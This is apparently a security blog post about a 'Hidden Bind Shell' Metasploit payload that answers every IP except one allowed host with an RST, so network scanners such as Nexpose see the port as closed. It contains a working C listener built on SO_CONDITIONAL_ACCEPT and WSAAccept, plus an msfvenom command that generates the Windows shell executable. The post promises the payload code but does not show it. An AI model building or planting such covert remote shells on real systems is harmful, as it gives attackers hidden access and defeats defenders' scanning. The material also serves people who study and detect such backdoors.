Many organizations use tools like Nexpose to perform periodic scans of their networks and to look for new or unidentified open ports. In this kind of environment it is hard for a bind shell to go unnoticed. For this reason, after finishing the ACL Bind Shellcode it occurred to me that the payload could be further improved so that it is only visible to the IP I choose. The result is another alternative to the ACL Bind Shell called “Hidden Bind Shell”. The payload is again a modified version of Stephen Fewer's shell_bind_tcp.
The idea is that the shellcode responds with an RST to any connection attempt coming from an IP different from the one set in the shellcode (defined by the variable AHOST, for allowed host). This is a good way to keep the shellcode hidden from scanning tools, since the socket will appear as “CLOSED” (on Windows XP you won't even see it locally in the netstat output).
To achieve this without implementing raw sockets I have used the setsockopt API, setting the SO_CONDITIONAL_ACCEPT option to true. With this configuration, whenever someone tries to establish a new connection the TCP stack does not respond with a SYN-ACK (as it does by default); instead, handling is delegated to the shellcode itself, which decides, based on the source IP address, whether or not to accept the connection. This condition is implemented by the conditional accept callback registered with WSAAccept.
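To make the mechanism concrete for anyone inventorying listeners, here is an added illustration (not the post's shellcode) of a plain Winsock listener that applies the same SO_CONDITIONAL_ACCEPT / WSAAccept filter: only the peer equal to AHOST is accepted, every other SYN is answered with an RST, so a remote scanner sees the port as CLOSED while the socket still exists locally. The listening port and AHOST value are constructed; only the address comparison compiles outside Windows.

```c
/* Added example: conditional-accept allow-list as described in the post.
 * Socket plumbing is Windows-only; decide()/decide_ip() are portable. */
#include <stdio.h>
#ifdef _WIN32
#  include <winsock2.h>
#  include <ws2tcpip.h>
#else
#  include <arpa/inet.h>
#  include <netinet/in.h>
#  define CF_ACCEPT 0   /* mirror the Winsock condition-function return codes */
#  define CF_REJECT 1
#endif

#define AHOST "192.168.1.200"   /* constructed: the only peer allowed to connect */
#define LPORT 54321             /* constructed listening port */

/* Compare the connecting peer's IPv4 address with AHOST. A CF_REJECT makes
 * the stack send an RST, so to that peer the port looks closed. */
int decide(const struct sockaddr_in *peer, const char *allowed)
{
    return peer->sin_addr.s_addr == inet_addr(allowed) ? CF_ACCEPT : CF_REJECT;
}

/* Convenience wrapper for testing the decision with dotted-quad strings. */
int decide_ip(const char *peer_ip, const char *allowed)
{
    struct sockaddr_in peer = {0};
    peer.sin_family = AF_INET;
    peer.sin_addr.s_addr = inet_addr(peer_ip);
    return decide(&peer, allowed);
}

#ifdef _WIN32
/* Condition function handed to WSAAccept; the stack calls it once per SYN
 * instead of replying with SYN-ACK on its own. */
static int CALLBACK cond(LPWSABUF caller_id, LPWSABUF caller_data, LPQOS sqos,
                         LPQOS gqos, LPWSABUF callee_id, LPWSABUF callee_data,
                         GROUP *g, DWORD_PTR ctx)
{
    (void)caller_data; (void)sqos; (void)gqos; (void)callee_id;
    (void)callee_data; (void)g; (void)ctx;
    return decide((const struct sockaddr_in *)caller_id->buf, AHOST);
}

int main(void)
{
    WSADATA wsa; WSAStartup(MAKEWORD(2, 2), &wsa);
    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    BOOL on = TRUE;   /* hand the accept decision to the application */
    setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, (const char *)&on, sizeof on);
    struct sockaddr_in me = {0};
    me.sin_family = AF_INET; me.sin_port = htons(LPORT);
    bind(s, (struct sockaddr *)&me, sizeof me); listen(s, 1);
    SOCKET c = WSAAccept(s, NULL, NULL, cond, 0);   /* returns only for AHOST */
    printf("connection from AHOST accepted: %d\n", c != INVALID_SOCKET);
    closesocket(c); closesocket(s); WSACleanup(); return 0;
}
#endif
```

Because the socket still exists, a host-side socket inventory (not an external scan) is where such a listener can be found.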
The code in charge of applying this functionality, in this first version, is shown below:
Its use is exactly the same as the ACL Bind Shell's. We use the AHOST variable to specify the IP that will have visibility of the shellcode. For example, to make the shellcode accessible only from the IP 192.168.1.200 we would run msfvenom as follows:
root@fzuckerman:~#msfvenom -p windows/shell_hidden_bind_tcp LPORT=54321 AHOST=192.168.1.200 -f exe > hidden_shell.exe